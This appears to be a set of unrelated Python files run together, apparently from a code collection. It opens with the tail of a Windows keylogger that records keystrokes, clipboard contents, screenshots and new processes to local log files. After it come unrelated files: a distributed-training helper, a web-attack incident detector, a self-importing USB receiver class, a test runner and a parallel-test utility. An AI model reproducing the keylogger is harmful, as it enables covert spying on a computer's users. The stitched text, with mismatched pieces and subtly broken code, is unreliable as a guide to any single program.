win32gui.ReleaseDC(desktop, win_dc)
win32gui.DeleteObject(bitmap.GetHandle())
def get_clipboard():
# Open the clipboard
win32clipboard.OpenClipboard()
# Grab the text on the clipboard
d=win32clipboard.GetClipboardData(win32con.CF_TEXT) # get clipboard data
# Close & Return the clipboard
win32clipboard.CloseClipboard()
return d
def OnKeyboardEvent(event):
# Open output log file
timestr = time.strftime("_%Y%m%d_%H00")
keylog_file = 'keylog_output{0}.txt'.format(timestr)
f = open(keylog_file,'a')
# Allow keylogger to be stopped if ctrl-e pressed
if event.Ascii == 5:
f.write('Closing Down Keylogger')
exit(1)
# Otherwise, capture the keystrokes!
elif event.Ascii != 0 or event.Ascii != 8:
# Handles a 'Enter' key press
if event.Ascii == 13:
keylogs = '\n'
f.write(keylogs)
# Capture Screenshot
take_screenshot()
# Capture Clipboard on copy/cut/paste
elif event.Ascii == 03 or event.Ascii == 22 or event.Ascii == 24:
keylogs = get_clipboard()
f.write("\n\nClipboard: ")
f.write(keylogs)
f.write('\n\n')
# Captues every other ascii character
else:
keylogs = chr(event.Ascii)
f.write(keylogs)
# Release the file
f.close()
def keylogger_main():
# Create a hook manager object
hm=pyHook.HookManager()
try:
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
pass
# Set the hook
hm.HookKeyboard()
# Wait forever for events
pythoncom.PumpMessages()
def process_logger_main():
w = wmi.WMI()
created = w.Win32_Process.watch_for("creation")
timestr = time.strftime("_%Y%m%d_%H00")
process_file = 'process_logger{0}.txt'.format(timestr)
pf = open(process_file, 'a')
while True:
c = created()
pf.write("\n\n====")
pf.write(str(c))
pf.flush()
pf.close()
def main():
# Setup Process 1: Keylogger
proc1 = multiprocessing.Process(target=keylogger_main)
proc1.start()
# Setup Process 2: Process Logger
proc2 = multiprocessing.Process(target=process_logger_main)
proc2.start()
# Stops both threads if one exits.
while True:
if not proc1.is_alive():
proc2.terminate()
break
else:
time.sleep(30)
# Exit
sys.exit(1)
if __name__ == '__main__':
main()
|
mirrored.py
|
"""
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitates development by hiding complexity for programs interacting with Hops services.
"""
import os
from hops import devices, tensorboard, hdfs
from hops.experiment_impl.util import experiment_utils
from hops import util
import pydoop.hdfs
import threading
import time
import socket
import json
from . import allreduce_reservation
def _run(sc, map_fun, run_id, local_logdir=False, name="no-name", evaluator=False):
"""
Args:
sc:
map_fun:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | MirroredStrategy - Distributed Training".format(name))
server = allreduce_reservation.Server(num_executions)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, util.num_executors()))
logdir = experiment_utils._get_logdir(app_id, run_id)
print('Finished Experiment \n')
path_to_return = logdir + '/.outputs.json'
if pydoop.hdfs.path.exists(path_to_return):
with pydoop.hdfs.open(path_to_return, "r") as fi:
contents = fi.read()
fi.close()
return logdir, json.loads(contents)
return logdir, None
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, num_executors):
"""
Args:
app_id:
run_id:
map_fun:
local_logdir:
server_addr:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
is_chief = False
logdir = None
tb_hdfs_path = None
try:
host = experiment_utils._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
client = allreduce_reservation.Client(server_addr)
host_port = host + ":" + str(port)
client.register({"worker": host_port, "index": executor_num})
cluster = client.await_reservations()
tmp_socket.close()
client.close()
task_index = experiment_utils._find_index(host_port, cluster)
if task_index == -1:
cluster["task"] = {"type": "chief", "index": 0}
else:
cluster["task"] = {"type": "worker", "index": task_index}
evaluator_node = None
if evaluator:
last_worker_index = len(cluster["cluster"]["worker"])-1
evaluator_node = cluster["cluster"]["worker"][last_worker_index]
cluster["cluster"]["evaluator"] = [evaluator_node]
del cluster["cluster"]["worker"][last_worker_index]
if evaluator_node == host_port:
cluster["task"] = {"type": "evaluator", "index": 0}
print('TF_CONFIG: {} '.format(cluster))
if num_executors > 1:
os.environ["TF_CONFIG"] = json.dumps(cluster)
is_chief = (cluster["task"]["type"] == "chief")
is_evaluator = (cluster["task"]["type"] == "evaluator")
logfile = experiment_utils._init_logger(experiment_utils._get_logdir(app_id, run_id), role=cluster["task"]["type"], index=cluster["task"]["index"])
if is_chief:
logdir = experiment_utils._get_logdir(app_id, run_id)
tb_hdfs_path, tb_pid = tensorboard._register(logdir, logdir, executor_num, local_logdir=local_logdir)
elif is_evaluator:
logdir = experiment_utils._get_logdir(app_id, run_id)
tensorboard.events_logdir = logdir
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
if is_chief:
experiment_utils._handle_return_simple(retval, experiment_utils._get_logdir(app_id, run_id), logfile)
task_end = time.time()
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
|
incident_detector.py
|
# Copyright (c) 2021, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import threading
import time
from sqlalchemy.sql.functions import sysdate
from baskerville.db import set_up_db
from baskerville.db.models import Attack
from baskerville.util.db_reader import DBReader
import datetime
import pandas as pd
class IncidentDetector:
def __init__(self,
db_config,
time_bucket_in_seconds=120,
time_horizon_in_seconds=600,
check_interval_in_seconds=120,
stat_refresh_period_in_minutes=30,
stat_window_in_hours=1,
min_traffic=3,
min_traffic_incident=50,
min_challenged_portion_incident=0.5,
sigma_score=2.5,
sigma_traffic=2.5,
dashboard_url_prefix=None,
dashboard_minutes_before=60,
dashboard_minutes_after=120,
logger=None,
mail_sender=None,
emails=None):
super().__init__()
self.kill = threading.Event()
self.check_interval_in_seconds = check_interval_in_seconds
self.time_bucket_in_seconds = time_bucket_in_seconds
self.time_horizon_in_seconds = time_horizon_in_seconds
self.sigma_score = sigma_score
self.sigma_traffic = sigma_traffic
self.min_traffic = min_traffic
self.min_traffic_incident = min_traffic_incident
self.min_challenged_portion_incident = min_challenged_portion_incident
self.db_config = db_config
if logger:
self.logger = logger
else:
self.logger = logging.getLogger('baskerville')
self.logger.addHandler(logging.StreamHandler(sysdate.stdout))
self.mail_sender = mail_sender
self.emails = emails
self.thread = None
self.last_timestamp = None
self.average_window_in_hours = stat_window_in_hours
self.stats_reader = DBReader(db_config, refresh_period_in_minutes=stat_refresh_period_in_minutes, logger=logger)
self.reader_traffic = DBReader(db_config, refresh_period_in_minutes=stat_refresh_period_in_minutes,
logger=logger)
self.candidates = None
self.incidents = None
self.dashboard_url_prefix = dashboard_url_prefix
self.dashboard_minutes_before = dashboard_minutes_before
self.dashboard_minutes_after = dashboard_minutes_after
self.lock = threading.Lock()
def _run(self):
self.logger.info('Starting incident detector...')
while True:
self._detect()
is_killed = self.kill.wait(self.check_interval_in_seconds)
if is_killed:
break
def start(self):
if self.thread is not None:
return
self.thread = threading.Thread(target=self._run)
self.thread.start()
def stop(self):
if self.thread is None:
return
self.kill.set()
self.thread.join()
def _get_dashboard_url(self, start, target):
ts_from = start - datetime.timedelta(minutes=self.dashboard_minutes_before)
ts_to = start + datetime.timedelta(minutes=self.dashboard_minutes_after)
ts_from = int(time.mktime(ts_from.timetuple()))
ts_to = int(time.mktime(ts_to.timetuple()))
return f'{self.dashboard_url_prefix}from={ts_from}000&to={ts_to}000&var-Host={target}'
def _read_sample(self):
session, engine = set_up_db(self.db_config.__dict__)
try:
stop = (datetime.datetime.utcnow() - 2 * datetime.timedelta(
seconds=self.time_horizon_in_seconds)).strftime("%Y-%m-%d %H:%M:%S %z")
query = f'SELECT floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds} AS "time", target, ' \
f'count(distinct ip) as traffic, (sum(prediction*1.0) / count(ip)) as challenged_portion ' \
f'FROM request_sets WHERE stop > \'{stop}\' ' \
f'and floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds} in ' \
f'(' \
f' select max(floor(extract(epoch from stop)/{self.time_bucket_in_seconds})*' \
f'{self.time_bucket_in_seconds}) from request_sets ' \
f' WHERE stop > \'{stop}\' ' \
f' ) ' \
' group by 1, 2 order by 1'
data = pd.read_sql(query, engine)
if data.empty:
return None
if self.last_timestamp is not None:
if data['time'][0] == self.last_timestamp:
return None
self.last_timestamp = data['time'][0]
return data
except Exception as e:
self.logger.error(str(e))
return None
finally:
session.close()
engine.dispose()
def get_hosts_with_incidents(self):
with self.lock:
if self.incidents is None or self.incidents.empty:
return []
return self.incidents['target'].tolist()
def _start_incidents(self, anomalies):
if anomalies is None or anomalies.empty:
return
if self.incidents is None or self.incidents.empty:
new_incidents = anomalies
else:
new_incidents = pd.merge(anomalies, self.incidents[['target']], how='outer', indicator=True)
new_incidents = new_incidents[new_incidents['_merge'] == 'left_only']
new_incidents = new_incidents.drop('_merge', 1)
new_incidents = new_incidents[new_incidents['traffic'] > self.min_traffic_incident]
if new_incidents.empty:
return
# save the new incidents
new_incidents['id'] = 0
new_incidents['start'] = pd.to_datetime(new_incidents['time'], unit='s', utc=True)
new_incidents = new_incidents.drop('time', 1)
session, engine = set_up_db(self.db_config.__dict__)
try:
for index, row in new_incidents.iterrows():
start = row['start'].strftime('%Y-%m-%d %H:%M:%SZ')
attack = Attack()
attack.start = start
attack.target = row['target']
attack.detected_traffic = row['traffic']
attack.anomaly_traffic_portion = row['challenged_portion']
dashboard_url = self._get_dashboard_url(row['start'], row['target'])
attack.dashboard_url = dashboard_url
session.add(attack)
session.commit()
new_incidents.at[index, 'id'] = attack.id
target = row['target']
self.logger.info(f'New incident, target={target}, id={attack.id}, '
f'traffic={row["traffic"]:.0f} ({row["avg_traffic"]:.0f}) '
f'anomaly_portion={row["challenged_portion"]:.2f} '
f'({row["avg_challenged_portion"]:.2f}) '
f'url="{dashboard_url}" '
)
if self.mail_sender and self.emails:
self.mail_sender.send(self.emails,
f'Incident {attack.id}, target = {target}',
f'Baskerville detected a new incident:\n\n'
f'ID = {attack.id}\n'
f'Targeted host = {target}\n'
f'Timestamp = {start}\n\n'
f'Anomaly traffic portion = {attack.anomaly_traffic_portion:.2f}\n'
f'Unique IPs (1st batch) = {attack.detected_traffic:.0f}\n'
f'Dashboard URL : {dashboard_url}'
)
except Exception as e:
self.logger.error(str(e))
return
finally:
session.close()
engine.dispose()
if self.incidents is None or self.incidents.empty:
self.incidents = new_incidents
return
self.incidents = pd.concat([self.incidents, new_incidents])
def _stop_incidents(self, regulars):
if self.incidents is None or self.incidents.empty:
return
stopped_incidents = pd.merge(self.incidents, regulars[['target', 'time']], how='inner', on='target')
if len(stopped_incidents) == 0:
return
stopped_incidents['stop'] = pd.to_datetime(stopped_incidents['time'], unit='s', utc=True)
stopped_incidents = stopped_incidents.drop('time', 1)
# update stop timestamp in the database
session, engine = set_up_db(self.db_config.__dict__)
try:
for index, row in stopped_incidents.iterrows():
session.query(Attack).filter(Attack.id == row['id']).update(
{'stop': row['stop'].strftime('%Y-%m-%d %H:%M:%SZ')})
target = row['target']
attack_id = row['id']
self.logger.info(f'Incident finished, target={target}, id = {attack_id}')
session.commit()
except Exception as e:
self.logger.error(str(e))
return
finally:
session.close()
engine.dispose()
# remove stopped incidents
self.incidents = pd.merge(self.incidents,
stopped_incidents[['target']], how='outer', on='target', indicator=True)
self.incidents = self.incidents[self.incidents['_merge'] == 'left_only']
self.incidents = self.incidents.drop('_merge', 1)
def _detect(self):
self.logger.info('Checking for new incidents...')
stop = (datetime.datetime.utcnow() - datetime.timedelta(
hours=self.average_window_in_hours)).strftime("%Y-%m-%d %H:%M:%S %z")
self.stats_reader.set_query(
f'select target, avg(traffic) as avg_traffic, stddev(traffic) as stddev_traffic, '
f'avg(challenged_portion) as avg_challenged_portion, '
f'stddev(challenged_portion) as stddev_challenged_portion from'
f'('
f'SELECT floor(extract(epoch from stop)/120)*120 AS "time", target, count(ip) as traffic, '
f'(sum(prediction*1.0) / count(ip)) as challenged_portion '
f'FROM request_sets WHERE stop > \'{stop}\' '
f'group by 1, 2'
f') a '
f'group by target'
)
stats = self.stats_reader.get()
if stats is None:
return
stats = stats[(~stats['avg_traffic'].isnull()) & (~stats['stddev_traffic'].isnull())
& (~stats['avg_challenged_portion'].isnull()) & (~stats['stddev_challenged_portion'].isnull())
& (stats['avg_traffic'] > self.min_traffic)
& (stats['avg_challenged_portion'] > 0)
& (stats['avg_challenged_portion'] < 0.6)]
sample = self._read_sample()
if sample is None:
return
batch = pd.merge(sample, stats, how='left', on='target')
condition = (batch['challenged_portion'] > (batch['avg_challenged_portion'] +
self.sigma_score * batch['stddev_challenged_portion'])) & \
(batch['traffic'] > (batch['avg_traffic'] + self.sigma_traffic * batch['stddev_traffic'])) & \
(batch['challenged_portion'] > self.min_challenged_portion_incident)
anomalies = batch[condition]
regulars = batch[~condition]
with self.lock:
self._stop_incidents(regulars)
self._start_incidents(anomalies)
|
UsbReceiver.py
|
import threading
import Queue
from UsbReceiver import UsbReceiver
class Cmds():
def __init__(self, normalizedVoltage, secondCommand):
self.NormalizedVoltage = normalizedVoltage
self.SecondCommand = secondCommand
class Tlm():
def __init__(self):
self.Positon = 0.0
self.Velocity = 0.0
self.NewTelemetry = 0.0
class UsbReceiver():
def __init__(self, portName, commFrequency):
self.usbReceiver = UsbReceiver()
self.usbReceiver.PortName = portName
self.usbReceiver.CommFrequency = commFrequency
self.Connected = False
self.Active = False
self.CommThread = threading.Thread(target=self.__usb_comm_thread__)
self.CommandDataQueue = Queue.LifoQueue(maxsize=5)
self.TelemetryDataQueue = Queue.LifoQueue(maxsize=5)
def Connect(self):
self.usbReceiver.Connect()
self.Connected = self.usbReceiver.Connected
self.Active = self.usbReceiver.Active
return self.Connected and self.Active
def Start(self):
if (self.Connected and self.Active):
self.CommThread.start()
print "Comm started."
return True
else:
print "Can't start comm. Not connected."
return False
def Stop(self):
self.Active = False
self.CommThread.join()
def SendCommands(self, cmds):
if(isinstance(cmds, Cmds)):
if (self.CommandDataQueue.full()):
self.CommandDataQueue.get()
self.CommandDataQueue.put(cmds)
return True
else:
print "Invalid command. Not sending."
return False
def RcvTlm(self):
return self.TelemetryDataQueue.get()
def __load__(self):
if (self.CommandDataQueue.empty()):
return
cmd = self.CommandDataQueue.get()
self.usbReceiver.NormalizedVoltage = cmd.NormalizedVoltage
self.usbReceiver.SecondCommand = cmd.SecondCommand
def __unload__(self):
tlm = Tlm()
tlm.Position = self.usbReceiver.Position
tlm.Velocity = self.usbReceiver.Velocity
tlm.NewTelemetry = self.usbReceiver.NewTelemetry
if (self.TelemetryDataQueue.full()):
self.TelemetryDataQueue.get()
self.TelemetryDataQueue.put(tlm)
def __usb_comm_thread__(self):
while(self.Connected and self.Active):
try:
self.__load__()
self.usbReceiver.RunComm()
self.__unload__()
except KeyboardInterrupt:
print 'Closing connection ... \n'
return
|
runtests.py
|
#!/usr/bin/env python3
# vim:ts=4:sw=4:et:
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import json
import math
import multiprocessing
import os
import os.path
import random
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import unittest
# in the FB internal test infra, ensure that we are running from the
# dir that houses this script rather than some other higher level dir
# in the containing tree. We can't use __file__ to determine this
# because our PAR machinery can generate a name like /proc/self/fd/3/foo
# which won't resolve to anything useful by the time we get here.
if not os.path.exists("runtests.py") and os.path.exists("watchman/runtests.py"):
os.chdir("watchman")
# Ensure that we can find pywatchman and integration tests (if we're not the
# main module, a wrapper is probably loading us up and we shouldn't screw around
# with sys.path).
if __name__ == "__main__":
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
sys.path.insert(1, os.path.join(os.getcwd(), "integration"))
sys.path.insert(1, os.path.join(os.getcwd(), "integration", "facebook"))
# Only Python 3.5+ supports native asyncio
has_asyncio = sys.version_info >= (3, 5)
if has_asyncio:
sys.path.insert(0, os.path.join(os.getcwd(), "tests", "async"))
import asyncio
try:
import queue
except Exception:
import Queue
queue = Queue
parser = argparse.ArgumentParser(
description="Run the watchman unit and integration tests"
)
parser.add_argument("-v", "--verbosity", default=2, help="test runner verbosity")
parser.add_argument(
"--keep",
action="store_true",
help="preserve all temporary files created during test execution",
)
parser.add_argument(
"--keep-if-fail",
action="store_true",
help="preserve all temporary files created during test execution if failed",
)
parser.add_argument("files", nargs="*", help="specify which test files to run")
parser.add_argument(
"--method", action="append", help="specify which python test method names to run"
)
def default_concurrency():
# Python 2.7 hangs when we use threads, so avoid it
# https://bugs.python.org/issue20318
if sys.version_info >= (3, 0):
level = min(4, math.ceil(1.5 * multiprocessing.cpu_count()))
if "CIRCLECI" in os.environ:
# Use fewer cores in circle CI because the inotify sysctls
# are pretty low, and we sometimes hit those limits.
level = level / 2
return int(level)
return 1
parser.add_argument(
"--concurrency",
default=default_concurrency(),
type=int,
help="How many tests to run at once",
)
parser.add_argument(
"--watcher",
action="store",
default="auto",
help="Specify which watcher should be used to run the tests",
)
parser.add_argument(
"--debug-watchman",
action="store_true",
help="Pauses start up and prints out the PID for watchman server process."
+ "Forces concurrency to 1.",
)
parser.add_argument(
"--watchman-path", action="store", help="Specify the path to the watchman binary"
)
parser.add_argument(
"--win7", action="store_true", help="Set env to force win7 compatibility tests"
)
parser.add_argument(
"--retry-flaky",
action="store",
type=int,
default=2,
help="How many additional times to retry flaky tests.",
)
parser.add_argument(
"--testpilot-json",
action="store_true",
help="Output test results in Test Pilot JSON format",
)
parser.add_argument(
"--pybuild-dir",
action="store",
help="For out-of-src-tree builds, where the generated python lives",
)
args = parser.parse_args()
if args.pybuild_dir is not None:
sys.path.insert(0, os.path.realpath(args.pybuild_dir))
# Import our local stuff after we've had a chance to look at args.pybuild_dir.
# The `try` block prevents the imports from being reordered
try:
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
except ImportError:
raise
# We test for this in a test case
os.environ["WATCHMAN_EMPTY_ENV_VAR"] = ""
os.environ["HGUSER"] = "John Smith <smith@example.com>"
os.environ["NOSCMLOG"] = "1"
os.environ["WATCHMAN_NO_SPAWN"] = "1"
if args.win7:
os.environ["WATCHMAN_WIN7_COMPAT"] = "1"
# Ensure that we find the watchman we built in the tests
if args.watchman_path:
args.watchman_path = os.path.realpath(args.watchman_path)
bin_dir = os.path.dirname(args.watchman_path)
os.environ["WATCHMAN_BINARY"] = args.watchman_path
else:
bin_dir = os.path.dirname(__file__)
os.environ["PYWATCHMAN_PATH"] = os.path.join(os.getcwd(), "python")
os.environ["WATCHMAN_PYTHON_BIN"] = os.path.abspath(
os.path.join(os.getcwd(), "python", "bin")
)
os.environ["PATH"] = "%s%s%s" % (
os.path.abspath(bin_dir),
os.pathsep,
os.environ["PATH"],
)
# We'll put all our temporary stuff under one dir so that we
# can clean it all up at the end
temp_dir = TempDir.get_temp_dir(args.keep)
def interrupt_handler(signo, frame):
Interrupt.setInterrupted()
signal.signal(signal.SIGINT, interrupt_handler)
class Result(unittest.TestResult):
# Make it easier to spot success/failure by coloring the status
# green for pass, red for fail and yellow for skip.
# also print the elapsed time per test
transport = None
encoding = None
attempt = 0
def shouldStop(self):
if Interrupt.wasInterrupted():
return True
return super(Result, self).shouldStop()
def startTest(self, test):
self.startTime = time.time()
super(Result, self).startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self.startTime
super(Result, self).addSuccess(test)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "passed",
"test": test.id(),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[32mPASS\033[0m %s (%.3fs)%s"
% (test.id(), elapsed, self._attempts())
)
def addSkip(self, test, reason):
elapsed = time.time() - self.startTime
super(Result, self).addSkip(test, reason)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "skipped",
"test": test.id(),
"details": reason,
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print("\033[33mSKIP\033[0m %s (%.3fs) %s" % (test.id(), elapsed, reason))
def __printFail(self, test, err):
elapsed = time.time() - self.startTime
t, val, trace = err
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "failed",
"test": test.id(),
"details": "".join(traceback.format_exception(t, val, trace)),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[31mFAIL\033[0m %s (%.3fs)%s\n%s"
% (
test.id(),
elapsed,
self._attempts(),
"".join(traceback.format_exception(t, val, trace)),
)
)
def addFailure(self, test, err):
self.__printFail(test, err)
super(Result, self).addFailure(test, err)
def addError(self, test, err):
self.__printFail(test, err)
super(Result, self).addError(test, err)
def setAttemptNumber(self, attempt):
self.attempt = attempt
def _attempts(self):
if self.attempt > 0:
return " (%d attempts)" % self.attempt
return ""
def expandFilesList(files):
"""expand any dir names into a full list of files"""
res = []
for g in args.files:
if os.path.isdir(g):
for dirname, _dirs, files in os.walk(g):
for f in files:
if not f.startswith("."):
res.append(os.path.normpath(os.path.join(dirname, f)))
else:
res.append(os.path.normpath(g))
return res
if args.files:
args.files = expandFilesList(args.files)
def shouldIncludeTestFile(filename):
"""used by our loader to respect the set of tests to run"""
global args
fname = os.path.relpath(filename.replace(".pyc", ".py"))
if args.files:
for f in args.files:
if f == fname:
return True
return False
if args.method:
# implies python tests only
if not fname.endswith(".py"):
return False
return True
def shouldIncludeTestName(name):
"""used by our loader to respect the set of tests to run"""
global args
if args.method:
for f in args.method:
if f in name:
# the strict original interpretation of this flag
# was pretty difficult to use in practice, so we
# now also allow substring matches against the
# entire test name.
return True
return False
return True
class Loader(unittest.TestLoader):
"""allows us to control the subset of which tests are run"""
def __init__(self):
super(Loader, self).__init__()
def loadTestsFromTestCase(self, testCaseClass):
return super(Loader, self).loadTestsFromTestCase(testCaseClass)
def getTestCaseNames(self, testCaseClass):
names = super(Loader, self).getTestCaseNames(testCaseClass)
return filter(lambda name: shouldIncludeTestName(name), names)
def loadTestsFromModule(self, module, *args, **kw):
if not shouldIncludeTestFile(module.__file__):
return unittest.TestSuite()
return super(Loader, self).loadTestsFromModule(module, *args, **kw)
loader = Loader()
suite = unittest.TestSuite()
directories = ["python/tests", "integration"]
facebook_directory = "integration/facebook"
if os.path.exists(facebook_directory):
# the facebook dir isn't sync'd to github, but it
# is present internally, so it should remain in this list
directories += [facebook_directory]
if has_asyncio:
directories += ["tests/async"]
for d in directories:
suite.addTests(loader.discover(d, top_level_dir=d))
if os.name == "nt":
t_globs = "tests/*.exe"
else:
t_globs = "tests/*.t"
tls = threading.local()
# Manage printing from concurrent threads
# http://stackoverflow.com/a/3030755/149111
class ThreadSafeFile(object):
def __init__(self, f):
self.f = f
self.lock = threading.RLock()
self.nesting = 0
def _getlock(self):
self.lock.acquire()
self.nesting += 1
def _droplock(self):
nesting = self.nesting
self.nesting = 0
for _ in range(nesting):
self.lock.release()
def __getattr__(self, name):
if name == "softspace":
return tls.softspace
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == "softspace":
tls.softspace = value
else:
return object.__setattr__(self, name, value)
def write(self, data):
self._getlock()
self.f.write(data)
if data == "\n":
self._droplock()
def flush(self):
self._getlock()
self.f.flush()
self._droplock()
sys.stdout = ThreadSafeFile(sys.stdout)
tests_queue = queue.Queue()
results_queue = queue.Queue()
def runner():
global results_queue
global tests_queue
broken = False
try:
# Start up a shared watchman instance for the tests.
inst = WatchmanInstance.Instance(
{"watcher": args.watcher}, debug_watchman=args.debug_watchman
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
if has_asyncio:
# Each thread will have its own event loop
asyncio.set_event_loop(asyncio.new_event_loop())
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
while not broken:
test = tests_queue.get()
try:
if test == "terminate":
break
if Interrupt.wasInterrupted() or broken:
continue
result = None
for attempt in range(0, args.retry_flaky + 1):
# Check liveness of the server
try:
client = pywatchman.client(timeout=3.0, sockpath=inst.getSockPath())
client.query("version")
client.close()
except Exception as exc:
print(
"Failed to connect to watchman server: %s; starting a new one"
% exc
)
try:
inst.stop()
except Exception:
pass
try:
inst = WatchmanInstance.Instance(
{"watcher": args.watcher},
debug_watchman=args.debug_watchman,
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
continue
try:
result = Result()
result.setAttemptNumber(attempt)
if hasattr(test, "setAttemptNumber"):
test.setAttemptNumber(attempt)
test.run(result)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
break
except Exception as e:
print(e)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
if (
not result.wasSuccessful()
and "TRAVIS" in os.environ
and hasattr(test, "dumpLogs")
):
test.dumpLogs()
results_queue.put(result)
finally:
tests_queue.task_done()
if not broken:
inst.stop()
def expand_suite(suite, target=None):
"""recursively expand a TestSuite into a list of TestCase"""
if target is None:
target = []
for test in suite:
if isinstance(test, unittest.TestSuite):
expand_suite(test, target)
else:
target.append(test)
# randomize both because we don't want tests to have relatively
# dependency ordering and also because this can help avoid clumping
# longer running tests together
random.shuffle(target)
return target
def queue_jobs(tests):
for test in tests:
tests_queue.put(test)
all_tests = expand_suite(suite)
if args.debug_watchman:
args.concurrency = 1
elif len(all_tests) < args.concurrency:
args.concurrency = len(all_tests)
queue_jobs(all_tests)
if args.concurrency > 1:
for _ in range(args.concurrency):
t = threading.Thread(target=runner)
t.daemon = True
t.start()
# also send a termination sentinel
tests_queue.put("terminate")
# Wait for all tests to have been dispatched
tests_queue.join()
else:
# add a termination sentinel
tests_queue.put("terminate")
runner()
# Now pull out and aggregate the results
tests_run = 0
tests_failed = 0
tests_skipped = 0
while not results_queue.empty():
res = results_queue.get()
tests_run = tests_run + res.testsRun
tests_failed = tests_failed + len(res.errors) + len(res.failures)
tests_skipped = tests_skipped + len(res.skipped)
if not args.testpilot_json:
print(
"Ran %d, failed %d, skipped %d, concurrency %d"
% (tests_run, tests_failed, tests_skipped, args.concurrency)
)
if "APPVEYOR" in os.environ:
logdir = "logs7" if args.win7 else "logs"
logzip = "%s.zip" % logdir
shutil.copytree(tempfile.tempdir, logdir)
subprocess.call(["7z", "a", logzip, logdir])
subprocess.call(["appveyor", "PushArtifact", logzip])
if "CIRCLE_ARTIFACTS" in os.environ:
print("Creating %s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"])
subprocess.call(
[
"zip",
"-q",
"-r",
"%s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"],
temp_dir.get_dir(),
]
)
if tests_failed or (tests_run == 0):
if args.keep_if_fail:
temp_dir.set_keep(True)
if args.testpilot_json:
# When outputting JSON, our return code indicates if we successfully
# produced output or not, not whether the tests passed. The JSON
# output contains the detailed test pass/failure information.
sys.exit(0)
sys.exit(1)
|
parallel.py
|
import contextlib
import itertools
import sys
import threading
import traceback
from typing import Any, Callable, Dict, Iterator, List, Tuple, TypeVar
import pytest
from determined import core
T = TypeVar("T")
class Execution:
"""
parallel.Execution is a tool for writing easy threading-based parallel tests.
Execution.run is the main helper function, but there are a few magic getters that return
correct thread-specific values when called from within an Execution.run-wrapped function.
Example usage:
SIZE = 10
with parallel.Execution(SIZE) as pex:
@pex.run
def all_ranks():
return pex.rank
assert all_ranks == list(range(SIZE))
"""
def __init__(
self, size: int, local_size: int = 1, make_distributed_context: bool = True
) -> None:
assert size % local_size == 0, f"size%local_size must be 0 ({size}%{local_size})"
self.size = size
self.local_size = local_size
self.cross_size = size // local_size
# We keep some thread-specific info to implement the magic getters.
self._info: Dict[int, Tuple[int, int, int]] = {}
self._dist = None
if make_distributed_context:
def _make_distributed_context() -> core.DistributedContext:
return core.DistributedContext(
rank=self.rank,
size=self.size,
local_rank=self.local_rank,
local_size=self.local_size,
cross_rank=self.cross_rank,
cross_size=self.cross_size,
chief_ip="localhost",
)
self._dist = self.run(_make_distributed_context)
def __enter__(self) -> "Execution":
return self
def __exit__(self, *arg: Any) -> None:
if not self._dist:
return
for dist in self._dist:
dist.close()
def run(self, fn: Callable[[], T]) -> List[T]:
"""
Run the same function on one-thread-per-rank, assert there were no exceptions, and return
the results from each rank.
run can be used as a decorator or called directly.
"""
results = [None] * self.size # type: List
errors = [None] * self.size # type: List
threads = []
for cross_rank, local_rank in itertools.product(
range(self.cross_size), range(self.local_size)
):
rank = cross_rank * self.local_size + local_rank
def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
thread_id = threading.get_ident()
self._info[thread_id] = (rank, cross_rank, local_rank)
try:
results[rank] = fn()
# Catch anything, including a pytest.Fail (so we can preserve it).
except BaseException as e:
# Print the error to stderr immediately, in case it results in a hang.
traceback.print_exc()
errors[rank] = (rank, e, sys.exc_info())
finally:
del self._info[thread_id]
threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Filter empty errors.
